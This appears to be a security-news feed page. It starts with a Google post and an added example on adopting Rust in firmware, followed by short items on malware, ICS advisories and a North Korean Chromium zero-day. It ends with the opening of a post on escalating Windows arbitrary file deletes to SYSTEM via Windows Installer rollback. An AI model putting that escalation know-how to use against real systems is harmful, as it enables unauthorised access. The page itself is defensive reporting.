The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.Incremental Rust AdoptionOur incremental approach focusing on replacing new and highest risk existing code (for example, code which processes external untrusted input) can provide maximum security benefits with the least amount of effort. Simply writing any new code in Rust reduces the number of new vulnerabilities and over time can lead to a reduction in the number of outstanding vulnerabilities.You can replace existing C functionality by writing a thin Rust shim that translates between an existing Rust API and the C API the codebase expects. The C API is replicated and exported by the shim for the existing codebase to link against. The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API. This is a common approach when rewriting or replacing existing libraries with a Rust alternative.Challenges and ConsiderationsThere are several challenges you need to consider before introducing Rust to your firmware codebase. In the following section we address the general state of no_std Rust (that is, bare-metal Rust code), how to find the right off-the-shelf crate (a rust library), porting an std crate to no_std, using Bindgen to produce FFI bindings, how to approach allocators and panics, and how to set up your toolchain.The Rust Standard Library and Bare-Metal EnvironmentsRust''s standard library consists of three crates: core, alloc, and std. The core crate is always available. The alloc crate requires an allocator for its functionality. The std crate assumes a full-blown operating system and is commonly not supported in bare-metal environments. A third-party crate indicates it doesn’t rely on std through the crate-level #![no_std] attribute. This crate is said to be no_std compatible. 
The rest of the blog will focus on these.Choosing a Component to ReplaceWhen choosing a component to replace, focus on self-contained components with robust testing. Ideally, the components functionality can be provided by an open-source implementation readily available which supports bare-metal environments.Parsers which handle standard and commonly used data formats or protocols (such as, XML or DNS) are good initial candidates. This ensures the initial effort focuses on the challenges of integrating Rust with the existing code base and build system rather than the particulars of a complex component and simplifies testing. This approach eases introducing more Rust later on.Choosing a Pre-Existing Crate (Rust Library)Picking the right open-source crate (Rust library) to replace the chosen component is crucial. Things to consider are:Is the crate well maintained, for example, are open issues being addressed and does it use recent crate versions?How widely used is the crate? This may be used as a quality signal, but also important to consider in the context of using crates later on which may depend on it.Does the crate have acceptable documentation?Does it have acceptable test coverage?Additionally, the crate should ideally be no_std compatible, meaning the standard library is either unused or can be disabled. While a wide range of no_std compatible crates exist, others do not yet support this mode of operation – in those cases, see the next section on converting a std library to no_std.By convention, crates which optionally support no_std will provide an std feature to indicate whether the standard library should be used. Similarly, the alloc feature usually indicates using an allocator is optional.Note: Even when a library declares #![no_std] in its source, there is no guarantee that its dependencies don’t depend on std. 
We recommend looking through the dependency tree to ensure that all dependencies support no_std, or test whether the library compiles for a no_std target. The only way to know is currently by trying to compile the crate for a bare-metal target.For example, one approach is to run cargo check with a bare-metal toolchain provided through rustup:$ rustup target add aarch64-unknown-none$ cargo check --target aarch64-unknown-none --no-default-featuresPorting a std Library to no_stdIf a library does not support no_std, it might still be possible to port it to a bare-metal environment – especially file format parsers and other OS agnostic workloads. Higher-level functionality such as file handling, threading, and async code may present more of a challenge. In those cases, such functionality can be hidden behind feature flags to still provide the core functionality in a no_std build.To port a std crate to no_std (core+alloc):In the cargo.toml file, add a std feature, then add this std feature to the default featuresAdd the following lines to the top of the lib.rs:#![no_std]#[cfg(feature = ""std"")]extern crate std;extern crate alloc;Then, iteratively fix all occurring compiler errors as follows:Move any use directives from std to either core or alloc.Add use directives for all types that would otherwise automatically be imported by the std prelude, such as alloc::vec::Vec and alloc::string::String.Hide anything that doesn''t exist in core or alloc and cannot otherwise be supported in the no_std build (such as file system accesses) behind a #[cfg(feature = ""std"")] guard.Anything that needs to interact with the embedded environment may need to be explicitly handled, such as functions for I/O. 
These likely need to be behind a #[cfg(not(feature = ""std""))] guard.Disable std for all dependencies (that is, change their definitions in Cargo.toml, if using Cargo).This needs to be repeated for all dependencies within the crate dependency tree that do not support no_std yet.Custom Target ArchitecturesThere are a number of officially supported targets by the Rust compiler, however, many bare-metal targets are missing from that list. Thankfully, the Rust compiler lowers to LLVM IR and uses an internal copy of LLVM to lower to machine code. Thus, it can support any target architecture that LLVM supports by defining a custom target.Defining a custom target requires a toolchain built with the channel set to dev or nightly. Rust’s Embedonomicon has a wealth of information on this subject and should be referred to as the source of truth. To give a quick overview, a custom target JSON file can be constructed by finding a similar supported target and dumping the JSON representation:$ rustc --print target-list[...]armv7a-none-eabi[...]$ rustc -Z unstable-options --print target-spec-json --target armv7a-none-eabiThis will print out a target JSON that looks something like:$ rustc --print target-spec-json -Z unstable-options --target=armv7a-none-eabi{  ""abi"": ""eabi"",  ""arch"": ""arm"",  ""c-enum-min-bits"": 8,  ""crt-objects-fallback"": ""false"",  ""data-layout"": ""e-m:e-p:32:32-Fi8-i64:64-v128:64:128-a:0:32-n32-S64"",  [...]}This output can provide a starting point for defining your target. Of particular note, the data-layout field is defined in the LLVM documentation.Once the target is defined, libcore and liballoc (and libstd, if applicable) must be built from source for the newly defined target. 
If using Cargo, building with -Z build-std accomplishes this, indicating that these libraries should be built from source for your target along with your crate module:

```shell
# set build-std to the list of libraries needed
cargo build -Z build-std=core,alloc --target my_target.json
```

Building Rust With LLVM Prebuilts

If the bare-metal architecture is not supported by the LLVM bundled internal to the Rust toolchain, a custom Rust toolchain can be produced with any LLVM prebuilts that support the target.

The instructions for building a Rust toolchain can be found in detail in the Rust Compiler Developer Guide. In the config.toml, llvm-config must be set to the path of the LLVM prebuilts.

You can find the latest Rust toolchain supported by a particular version of LLVM by checking the release notes and looking for releases which bump the minimum supported LLVM version. For example, Rust 1.76 bumped the minimum LLVM to 16 and 1.73 bumped the minimum LLVM to 15. That means that with LLVM 15 prebuilts, the latest Rust toolchain that can be built is 1.75.

Creating a Drop-In Rust Shim

To create a drop-in replacement for the C/C++ function or API being replaced, the shim needs two things: it must provide the same API as the replaced library, and it must know how to run in the firmware's bare-metal environment.

Exposing the Same API

The first is achieved by defining a Rust FFI interface with the same function signatures. We try to keep the amount of unsafe Rust as minimal as possible by putting the actual implementation in a safe function and exposing a thin unsafe wrapper around it.

For example, the FreeRTOS coreJSON example includes a JSON_Validate C function with the following signature:

```c
JSONStatus_t JSON_Validate( const char * buf, size_t max );
```

We can write a shim in Rust between it and the memory-safe serde_json crate to expose the C function signature. We keep the unsafe code to a minimum and call through to a safe function early:

```rust
// JSONStatus_t and JSONStatus come from the generated coreJSON bindings;
// ILLEGAL_DOC is assumed to be the JSONStatus value for an invalid document.
use core::ffi::c_char;
use core::ptr::slice_from_raw_parts;
use serde_json::Value;

#[no_mangle]
pub unsafe extern "C" fn JSON_Validate(buf: *const c_char, len: usize) -> JSONStatus_t {
    if buf.is_null() {
        JSONStatus::JSONNullParameter as _
    } else if len == 0 {
        JSONStatus::JSONBadParameter as _
    } else {
        json_validate(slice_from_raw_parts(buf as _, len).as_ref().unwrap()) as _
    }
}

// No more unsafe code in here.
fn json_validate(buf: &[u8]) -> JSONStatus {
    if serde_json::from_slice::<Value>(buf).is_ok() {
        JSONStatus::JSONSuccess
    } else {
        ILLEGAL_DOC
    }
}
```

Note: This is a very simple example. For a highly resource-constrained target, you can avoid alloc and use serde_json_core, which has even lower overhead but requires pre-defining the JSON structure so it can be allocated on the stack.

For further details on how to create an FFI interface, the Rustonomicon covers this topic extensively.

Calling Back to C/C++ Code

In order for any Rust component to be functional within a C-based firmware, it will need to call back into the C code for things such as allocations or logging. Thankfully, there are a variety of tools available which automatically generate Rust FFI bindings to C. That way, C functions can easily be invoked from Rust.

The standard means of doing this is with the Bindgen tool. You can use Bindgen to parse all relevant C headers that define the functions Rust needs to call into. It's important to invoke Bindgen with the same CFLAGS as the code in question is built with, to ensure that the bindings are generated correctly. Experimental support for producing bindings to static inline functions is also available.

Hooking Up The Firmware's Bare-Metal Environment

Next we need to hook up Rust panic handlers, global allocators, and critical section handlers to the existing code base.
This requires producing definitions for each of these which call into the existing firmware C functions.

The Rust panic handler must be defined to handle unexpected states or failed assertions. A custom panic handler can be defined via the panic_handler attribute. This is specific to the target and should, in most cases, either point to an abort function for the current task/process, or a panic function provided by the environment.

If an allocator is available in the firmware and the crate relies on the alloc crate, the Rust allocator can be hooked up by defining a global allocator implementing GlobalAlloc.

If the crate in question relies on concurrency, critical sections will need to be handled. Rust's core and alloc crates do not directly provide a means for defining this; however, the critical_section crate is commonly used to handle this functionality for a number of architectures, and can be extended to support more.

It can be useful to hook up functions for logging as well. Simple wrappers around the firmware's existing logging functions can expose these to Rust and be used in place of print or eprint and the like. A convenient option is to implement the Log trait.

Fallible Allocations and alloc

Rust's alloc crate normally assumes that allocations are infallible (that is, memory allocations won't fail). However, due to memory constraints this isn't true in most bare-metal environments. Under normal circumstances Rust panics and/or aborts when an allocation fails; this may be acceptable behavior for some bare-metal environments, in which case there are no further considerations when using alloc.

If there's a clear justification or requirement for fallible allocations, however, additional effort is required to ensure that either allocations can't fail or that failures are handled. One approach is to use a crate that provides statically allocated fallible collections, such as the heapless crate, or dynamic fallible allocations like fallible_vec. Another is to exclusively use try_* methods such as Vec::try_reserve, which check whether the allocation is possible.

Rust is in the process of formalizing better support for fallible allocations, with an experimental allocator in nightly allowing failed allocations to be handled by the implementation. There is also the unstable cfg flag for alloc called no_global_oom_handling which removes the infallible methods, ensuring they are not used.

Build Optimizations

Building the Rust library with LTO is necessary to optimize for code size. The existing C/C++ code base does not need to be built with LTO when passing -C lto=true to rustc. Additionally, setting -C codegen-units=1 results in further optimizations in addition to reproducibility. If using Cargo to build, the following Cargo.toml settings are recommended to reduce the output library size:

```toml
[profile.release]
panic = "abort"
lto = true
codegen-units = 1
strip = "symbols"
# opt-level "z" may produce better results in some circumstances
opt-level = "s"
```

Pass the -Z remap-cwd-prefix=. flag to rustc (or to Cargo via the RUSTFLAGS environment variable) to strip current-working-directory path strings from the output.

In terms of performance, Rust demonstrates similar performance to C. The most relevant example may be the Rust binder Linux kernel driver, which found "that Rust binder has similar performance to C binder".

When linking LTO'd Rust staticlibs together with C/C++, it's recommended to ensure a single Rust staticlib ends up in the final linkage; otherwise there may be duplicate symbol errors when linking. This may mean combining multiple Rust shims into a single static library by re-exporting them from a wrapper module.

Memory Safety for Firmware, Today

Using the process outlined in this blog post, you can begin to introduce Rust into large legacy firmware code bases immediately. Replacing security-critical components with off-the-shelf open-source memory-safe implementations and developing new features in a memory-safe language will lead to fewer critical vulnerabilities while also providing an improved developer experience.

Special thanks to our colleagues who have supported and contributed to these efforts: Roger Piqueras Jover, Stephan Chen, Gil Cukierman, Andrew Walbran, and Erik Gilling
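As an added example that is not part of the Google post, the following Rust combines two points the post makes separately: the thin unsafe C-ABI boundary of the JSON_Validate shim under "Exposing the Same API", and the fallible allocation discussed under "Fallible Allocations and alloc". It builds against core and alloc only, so apart from the host-only main function it drops unchanged into a no_std crate that supplies a global allocator and panic handler. The JsonStatus enum and its values, MAX_DEPTH, and the bracket-and-string checker are stand-ins chosen here; the real coreJSON JSONStatus_t values and serde_json are not used, so treat those names as assumptions rather than the project's code.

```rust
// Added example: a C-ABI shim in the JSON_Validate style, written against
// core + alloc only, with the one allocation made fallible so that an
// out-of-memory condition is reported as a status code instead of a panic.
extern crate alloc;

use alloc::vec::Vec;
use core::ffi::c_char;
use core::slice;

/// Assumed status values, shaped like coreJSON's JSONStatus_t but not taken
/// from it. OutOfMemory is an addition for the bare-metal allocation path.
#[repr(C)]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum JsonStatus {
    Success = 0,
    IllegalDocument = 1,
    MaxDepthExceeded = 2,
    NullParameter = 3,
    BadParameter = 4,
    OutOfMemory = 5,
}

/// Assumed nesting limit; it bounds the single heap allocation below.
pub const MAX_DEPTH: usize = 32;

/// The only unsafe code: validate the raw C arguments, then hand a safe
/// slice to the safe implementation.
#[allow(non_snake_case)]
#[no_mangle]
pub unsafe extern "C" fn JSON_Validate(buf: *const c_char, len: usize) -> JsonStatus {
    if buf.is_null() {
        return JsonStatus::NullParameter;
    }
    if len == 0 {
        return JsonStatus::BadParameter;
    }
    // SAFETY: the C caller guarantees `buf` points to `len` readable bytes
    // that stay alive for the duration of this call (the coreJSON contract).
    let bytes = slice::from_raw_parts(buf as *const u8, len);
    json_validate(bytes)
}

// No unsafe code below this line.
pub fn json_validate(buf: &[u8]) -> JsonStatus {
    json_validate_with_depth(buf, MAX_DEPTH)
}

/// Stand-in validator: UTF-8 check plus balanced {} / [] outside strings.
/// It is deliberately simpler than a full JSON parser.
pub fn json_validate_with_depth(buf: &[u8], max_depth: usize) -> JsonStatus {
    if core::str::from_utf8(buf).is_err() {
        return JsonStatus::IllegalDocument;
    }
    // Fallible allocation: reserve the bracket stack once, up front.
    // try_reserve_exact returns Err when the request overflows or the
    // global allocator refuses it, instead of invoking the OOM handler.
    let mut stack: Vec<u8> = Vec::new();
    if stack.try_reserve_exact(max_depth).is_err() {
        return JsonStatus::OutOfMemory;
    }
    let mut in_string = false;
    let mut escaped = false;
    for &b in buf {
        if in_string {
            if escaped {
                escaped = false;
            } else if b == b'\\' {
                escaped = true;
            } else if b == b'"' {
                in_string = false;
            }
            continue;
        }
        match b {
            b'"' => in_string = true,
            b'{' | b'[' => {
                if stack.len() == max_depth {
                    return JsonStatus::MaxDepthExceeded;
                }
                // Cannot reallocate: capacity was reserved to max_depth above.
                stack.push(b);
            }
            b'}' => {
                if stack.pop() != Some(b'{') {
                    return JsonStatus::IllegalDocument;
                }
            }
            b']' => {
                if stack.pop() != Some(b'[') {
                    return JsonStatus::IllegalDocument;
                }
            }
            _ => {}
        }
    }
    if in_string || !stack.is_empty() {
        JsonStatus::IllegalDocument
    } else {
        JsonStatus::Success
    }
}

// Host-only entry point; on the firmware the C side calls JSON_Validate.
fn main() {
    // Constructed sample document, not captured from any device.
    let doc = b"{\"sensor\": [1, 2, {\"id\": \"x]\"}]}";
    let status = unsafe { JSON_Validate(doc.as_ptr() as *const c_char, doc.len()) };
    println!("JSON_Validate -> {:?}", status);
}
```

Because try_reserve_exact runs once before the loop, the later push calls can never reallocate, so the only allocation that can fail is the one explicitly mapped to OutOfMemory; passing an absurd depth such as usize::MAX exercises that path on a host without a starved allocator. When the firmware does provide a GlobalAlloc that returns null under pressure, the same branch is what keeps the shim from reaching the panic handler.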

by Google Security Blog

Malwarebytes offers both free and premium antivirus services to help protect your device. Here's what to know.

by ZDNET Security

A new malware campaign is spoofing Palo Alto Networks' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign. The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers

by The Hacker News

The vast majority of corporate finance professionals, 85%, now view such scams as an “existential” threat, a Medius study found.

by Cybersecurity Dive

Ransomware has evolved to target Linux systems. Learn about methods for infection and how to protect your IT environments from attacks.

by ITPro Today

As we continue to strengthen our presence in India and South Asia, we are excited to announce the appointment of Shashank Pathak to our Go-to-Market team. The post Zimperium Welcomes Shashank Pathak to Our Go-to-Market Team in India appeared first on Zimperium.

by Zimperium

The group has been among the most active threat groups of 2024, and is linked to a tool that can neutralize endpoint security.

by Cybersecurity Dive

Cybercrime wonk Sherrod DeGrippo is taking Microsoft’s software developers and engineers on a journey into her world, the depths of threat intelligence.

by Cybersecurity Dive

In this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc.

by Securelist

Key Takeaways

* A North Korean threat actor, Citrine Sleet, has been observed exploiting a zero-day vulnerability in Chromium, designated as CVE-2024-7971, to achieve Remote Code Execution (RCE).
* Citrine Sleet, also tracked by other security firms under the names AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, is attributed to Bureau 121 of North Korea's Reconnaissance General Bureau. The group primarily focuses on financial institutions, especially those involved with cryptocurrency, aiming for financial gain.
* The group's tactics, techniques, and procedures (TTPs) have now been linked to the FudModule rootkit, which has also been associated with Diamond Sleet, another North Korean threat actor.
* Citrine Sleet creates fraudulent websites that mimic legitimate cryptocurrency trading platforms to distribute fake job applications or entice targets into downloading a compromised cryptocurrency wallet or trading application.
* The TA typically infects targets with its custom trojan malware, AppleJeus, designed to gather information necessary to take control of victims' cryptocurrency assets.

Overview

The Citrine Sleet threat actor group was observed by Microsoft researchers exploiting the CVE-2024-7971 zero-day vulnerability in the V8 JavaScript and WebAssembly engine, which affects versions of Chromium prior to 128.0.6613.84. By exploiting this vulnerability, the attackers achieved remote code execution (RCE) within the sandboxed Chromium renderer process. Google released a patch for the vulnerability on August 21, 2024, and users are advised to update to the latest version of Chromium to mitigate the risk.

Technical Analysis

The observed attack chain involved a typical browser exploit sequence, starting with targets being directed to a Citrine Sleet-controlled exploit domain, voyagorclub[.]space, through common social engineering tactics. Once the users were connected, the zero-day RCE exploit for CVE-2024-7971 was deployed, allowing the attackers to download and load shellcode containing a Windows sandbox escape exploit and the FudModule rootkit into memory.

FudModule is an advanced rootkit designed to obtain kernel access while avoiding detection. Threat actors have been seen using the FudModule data-only rootkit to gain admin-to-kernel access on Windows-based systems, enabling read/write primitives and Direct Kernel Object Manipulation (DKOM).

The attack chain seen in Citrine Sleet's zero-day exploitation of CVE-2024-7971 closely mirrors the chain observed by Avast, which involves a variant of FudModule known as "FudModule 2.0." This variant includes malicious loaders and a late-stage remote access trojan (RAT). That research identified the previously unknown Kaolin RAT as the malware responsible for deploying the FudModule rootkit on targeted devices.

Conclusion and Recommendations

CVE-2024-7971 is the third vulnerability this year that North Korean threat actors have exploited to deploy the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193. To address zero-day exploits effectively, it is crucial not only to keep systems updated but also to use security solutions that offer comprehensive visibility across the cyberattack chain to detect and block attacker tools and malicious activities after exploitation.

To mitigate the risks posed by Citrine Sleet and similar threats, the following best practices are recommended:

* Activate the automatic software update function on your computer, mobile device, and any other linked devices when feasible and practical.
* Employ a trusted antivirus solution and internet security software suite on all connected devices, such as your PC, laptop, and mobile phone.
* Conduct consistent vulnerability assessments to maintain proactive security.
* Always use multi-factor authentication on accounts to lessen the risk of takeover.

The post FudModule Rootkit Targets Crypto, Linked to North Korean Citrine Sleet Group appeared first on Cyble.

by CYBLE

A recent report from the World Economic Forum explored how small and medium-sized enterprises (SMEs) can turn cybersecurity risk into an opportunity. We recently wrote about why securing small businesses is good for everyone – protecting third party providers at every level of a supply chain in order to enable a better overall security posture for every organisation in that chain. And we’re not alone in renewing our focus on the importance of security for SMEs; because as Akhilesh Tuteja (Global Cyber Security Leader at KPMG) noted in that World Economic Forum report, “the size of an enterprise no longer dictates its vulnerability to cyber threats.” Threat actors are targeting smaller businesses, identifying them as weak links that offer easy entry points into a network. What can SMEs do to improve their security and become small but strong links in global supply chains? SMEs must see cybersecurity as a business problem – not just a tech problem Small enterprises don’t have the same access to resources that larger organisations have. And because of this, they tend to focus on what’s immediately, obviously important (namely, sales and profit margins), and silo other aspects of business operations into small pots that sit much lower on their list of priorities. Cybersecurity is one of those aspects that gets compartmentalised and often neglected. Technical security systems are set up, and then forgotten about – with SMEs less likely to integrate security practices across their operations in an ongoing, dynamic way. This is a mistake. SMEs must change their perspective and start thinking about cybersecurity not as a technology problem, but as a business problem. “While understanding the technology that powers business is very important, understanding the risks it brings to business is far more important,” wrote Tuteja. 
“Unlike larger enterprises that can apply a higher degree of control across the enterprise, SMEs must identify areas of relevance and create a cyber strategy for different units, data types and systems. They should also explore more mature technologies, such as cloud computing, instead of spending time trying to build, manage and maintain their own systems.” When you integrate cybersecurity into your business strategy it creates opportunities for growth Instead of seeing cybersecurity as a risk alone, Tuteja urged small and medium enterprises to see it as an opportunity – with a good security strategy at the heart of an overall growth strategy. Why? Because customers, both in B2C and B2B markets, value trust. And they’re more likely to trust a small business if it can clearly demonstrate and explain the security protocols and practices it uses to keep customer information safe. When we interviewed Abeer Khedr (CISO at National Bank of Egypt) for the BHMEA blog, she said that the inequity between larger cyber resilient organisations, and smaller less resilient ones, will continue to increase. “This is a cause of concern because the less resilient companies could be our suppliers, our customers; it’s one ecosystem. This should drive our efforts in 2024 to increase awareness and support these companies on how to apply security measures and develop incident response capabilities to increase their cyber resilience.” Cybersecurity can’t be an afterthought for SMEs – and the cybersecurity sector needs to offer opportunities for small business leaders to understand the inextricable nature of business strategy and security, and develop security practices that facilitate high growth with low risk. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

Key Takeaways

* CISA Alert: CISA warns of critical ICS vulnerabilities in Rockwell Automation and Delta Electronics products.
* ThinManager ThinServer: Flaws in Rockwell Automation's ThinManager ThinServer (versions 11.1.0 to 13.2.1) could allow system-level code execution. Affected sector: Manufacturing.
* Delta DTN Soft: A vulnerability in Delta's DTN Soft (version 2.0.1 and prior) enables remote code execution. Update to version 2.1. Affected sector: Energy.
* FactoryTalk View SE: A flaw in Rockwell Automation's FactoryTalk View SE 13.0 allows unauthorized file modifications. Affected sectors: Chemical, Energy, and others.
* Mitigation: CISA advises minimizing ICS exposure, securing remote access, updating software, and implementing layered security measures.

Overview

On August 29, the Cybersecurity and Infrastructure Security Agency (CISA) released three advisories to warn users and administrators of several critical vulnerabilities affecting industrial control systems (ICS) from prominent vendors.

* Advisory ICSA-24-242-01 addresses vulnerabilities in Rockwell Automation ThinManager ThinServer.
* ICSA-24-242-02 covers a vulnerability in Delta Electronics DTN Soft.
* ICSA-24-226-06 advises users about a vulnerability in Rockwell Automation FactoryTalk View Site Edition (Update A).

Cyble's ICS vulnerabilities report last week looked at additional vulnerabilities in Rockwell and other ICS products, plus general recommendations for controlling risk in ICS networks.

Rockwell Automation ThinManager ThinServer Vulnerabilities

The first set of vulnerabilities, disclosed in ICSA-24-242-01, affects multiple versions of Rockwell Automation's ThinManager ThinServer software, a client management tool. The flaws, which include improper privilege management, incorrect permission assignment, and improper input validation, could allow attackers to read arbitrary files and execute code with system-level privileges. The affected versions of ThinManager ThinServer range from 11.1.0 to 13.2.1. CISA has assigned three CVE identifiers to these flaws: CVE-2024-7986, CVE-2024-7987, and CVE-2024-7988. The CVSS v4 scores for these vulnerabilities range from 6.8 to 9.3, indicating a high-to-critical level of risk.

Critical Infrastructure Sector Impacted: Manufacturing.

Delta Electronics DTN Soft Vulnerability

The second advisory, ICSA-24-242-02, focuses on a vulnerability in Delta Electronics' DTN Soft temperature control software. The flaw, a deserialization of untrusted data issue (CWE-502), could allow an attacker to achieve remote code execution. The vulnerability affects DTN Soft version 2.0.1 and prior. CISA has assigned CVE-2024-8255 to this flaw, with a CVSS v4 score of 8.4. Delta Electronics recommends updating to the latest version, 2.1, to mitigate this vulnerability.

Critical Infrastructure Sector Impacted: Energy.

Rockwell Automation FactoryTalk View Site Edition Vulnerability

The third advisory, ICSA-24-226-06, covers a vulnerability in Rockwell Automation's FactoryTalk View Site Edition, an HMI application. The flaw, an incorrect permission assignment for a critical resource (CWE-732), could allow any user to edit or replace files executed with elevated permissions. The affected version is FactoryTalk View SE 13.0. CISA has assigned CVE-2024-7513 to this vulnerability, with a CVSS v4 score of 8.5. Rockwell Automation recommends updating to a newer version of FactoryTalk to mitigate this vulnerability.

Critical Infrastructure Sectors Impacted: Chemical; Commercial Facilities; Energy; Government Facilities; Manufacturing; Water and Wastewater Systems.

CISA Mitigation Advice

Based on the CISA advisories for the three industrial control system (ICS) vulnerabilities, the following general recommendations and mitigations are provided:

1. Minimize Network Exposure:
* Ensure that ICS devices and systems are not accessible from the internet.
* Limit access to ICS devices and systems to only those who need it.
* Use firewalls and other network segmentation techniques to isolate ICS networks from business networks.

2. Implement Secure Remote Access Methods:
* Use Virtual Private Networks (VPNs) to establish secure remote connections.
* Regularly update VPN software and configurations to ensure they are secure.
* Consider using other secure remote access methods, such as SSH or HTTPS.

3. Perform Regular Software Updates:
* Regularly update ICS software to the latest versions to ensure you have the latest security patches and fixes.
* Use automated update mechanisms and monitoring to stay up-to-date.

4. Implement Security Best Practices:
* Use strong passwords and password policies to prevent unauthorized access.
* Implement access controls, such as role-based access control (RBAC) and least privilege access.
* Regularly audit and monitor ICS systems for suspicious activity.

5. Perform Impact Analysis and Risk Assessment:
* Regularly assess the potential impact of security incidents on your ICS systems.
* Develop and implement incident response plans to mitigate the effects of a security incident.

6. Use Secure Protocols and Communications:
* Use secure communication protocols, such as HTTPS and SSH, to protect data in transit.
* Regularly update and patch communication protocol implementations to ensure they are secure.

7. Implement Defense-in-Depth Strategies:
* Implement multiple layers of security controls to prevent and detect security incidents.
* Use a combination of technical and procedural controls to protect ICS systems.

8. Monitor for Suspicious Activity:
* Regularly monitor ICS systems and networks for suspicious activity.
* Implement intrusion detection and prevention systems to detect and prevent security incidents.

The post CISA Warns of Critical ICS Vulnerabilities in Rockwell and Delta Electronics appeared first on Cyble.

by CYBLE

Activists claim Japanese industrial robots are being used to build military equipment for Israel. The robot maker denies the claims, but the episode reveals the complex ethics of global manufacturing.

by WIRED Security News

argv[0] tampering (@Wietze), Moodle eval() misuse (@RedTeamPT), ntoskrnl.exe PoC (@b1thvn_), 4x wappd exploits (@hyprdude), and more!

by Bad Sector Labs

This bill requires Web browsers to have an easy-to-find (and use) setting for consumers to send an opt-out preference signal by default to every site and app they interact with.

by Dark Reading

Microsoft warned that the DPRK's latest innovative tack chains together previously unknown browser issues, then adds a rootkit to the mix to gain deep system access and steal crypto.

by Dark Reading

The Ohio city filed for a restraining order, claiming the researcher was working in tandem with the ransomware attackers.

by Dark Reading

The energy kahuna said that operations were disrupted after an attack on its supporting business applications.

by ITPro Today

One sign of the increasing maturity of the cybercriminal economy is the fast-growing use of infostealers, a category of malware that, as its name suggests, is designed to gather and exfiltrate information from your system.

by Barracuda

Insider threats are among the most challenging issues any cybersecurity team is likely to encounter. The only way to prevent these types of attacks is to ensure that data access is continuously monitored.

by Barracuda

U.S. Cyber Command has concluded CYBER FLAG 24-2, marking a significant milestone as the first iteration of the exercise to incorporate Offensive Cyberspace Operations, August 30.

by U.S. Cyber Command News

by Douglas Berdeaux, Senior Security Consultant   As penetration testers, ensuring the security and integrity of our tools and data is paramount. One key aspect of this is creating a […]

by Red Siege Blog

A roundup of every Hacker Summer Camp AI Talk, Bypassing airport security via SQL injection, Misconception about the nature of work, and more...

by Hive Five

A hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus. "Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools. "For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which

by The Hacker News

A social engineering campaign is targeting entities in the Middle East using malware that impersonates Palo Alto Networks’ GlobalProtect VPN, according to researchers at Trend Micro.

by KnowBe4

Researchers at Palo Alto Networks’ Unit 42 are tracking dozens of scam campaigns that are using deepfake videos to impersonate CEOs, news anchors, and high-profile government officials.

by KnowBe4

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation. "It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity

by The Hacker News

The malware, first discovered two years ago, has returned in campaigns using SEO poisoning.

by Dark Reading

Episode 361 looks at the right to disconnect, Black Myth: Wukong and much more!

by Kaspersky

This blog post will guide you through the essential best practices for integrating DAST into your mobile development process. The post DAST Best Practices for Mobile Developers appeared first on Zimperium.

by Zimperium

Transport for London (TfL) is apparently fighting a cybersecurity incident but is rather sparing in providing details

by Malwarebytes Labs

The energy kahuna said that operations were disrupted after an attack on its supporting business applications.

by Dark Reading

Attackers have added aggressive social engineering to their arsenal, along with a novel Windows-manipulating persistence mechanism that demands developer vigilance.

by Dark Reading

This version of the blog is preserved for archival purposes only. An updated version of this blog, including links to new PoC code, can be found here. What do you do when you’ve found an arbitrary file delete as NT AUTHORITY\SYSTEM? Probably just sigh and call it a DoS. Well, no more. In this article, we’ll show you some great techniques for getting much more out of your arbitrary file deletes, arbitrary folder deletes, and other seemingly low-impact filesystem-based exploit primitives. The Trouble with Arbitrary File Deletes When you consider how to leverage an arbitrary file delete on Windows, two great obstacles present themselves: Most critical Windows OS files are locked down with DACLs that prevent modification even by SYSTEM. Instead, most OS files are owned by TrustedInstaller, and only that account has permission to modify them. (Exercise for the reader: Find the critical Windows OS files that can still be deleted or overwritten by SYSTEM!) Even if you find a file that you can delete as SYSTEM, it needs to be something that causes a “fail-open” (degradation of security) if deleted. A third problem that can arise is that some critical system files are inaccessible at all times due to sharing violations. Experience shows that finding a file to delete that meets all the above criteria is very hard. When looking in the usual places, which would be within C:\Windows, C:\Program Files or C:\ProgramData, we’re not aware of anything that fits the bill. There is some prior work that involves exploiting antivirus and other products, but this is dependent on vulnerable behavior in those products. The Solution is Found Elsewhere: Windows Installer In March of 2021, we received a vulnerability report from researcher Abdelhamid Naceri (halov). The vulnerability he reported was an arbitrary file delete in the User Profile service, running as SYSTEM. 
Remarkably, his submission also included a technique to parlay this file delete into an escalation of privilege (EoP), resulting in a command prompt running as SYSTEM. The EoP works by deleting a file, but not in any of the locations you would usually think of. To understand the route to privilege escalation, we need to explain a bit about the operation of the Windows Installer service. The following explanation is simplified somewhat.

The Windows Installer service is responsible for performing installations of applications. An application author supplies an .msi file, which is a database defining the changes that must be made to install the application: folders to be created, files to be copied, registry keys to be modified, custom actions to be executed, and so forth. To ensure that system integrity is maintained when an installation cannot be completed, and to make it possible to revert an installation cleanly, the Windows Installer service enforces transactionality. Each time it makes a change to the system, Windows Installer makes a record of the change, and each time it overwrites an existing file on the system with a newer version from the package being installed, it retains a copy of the older version. In case the install needs to be rolled back, these records allow the Windows Installer service to restore the system to its original state.

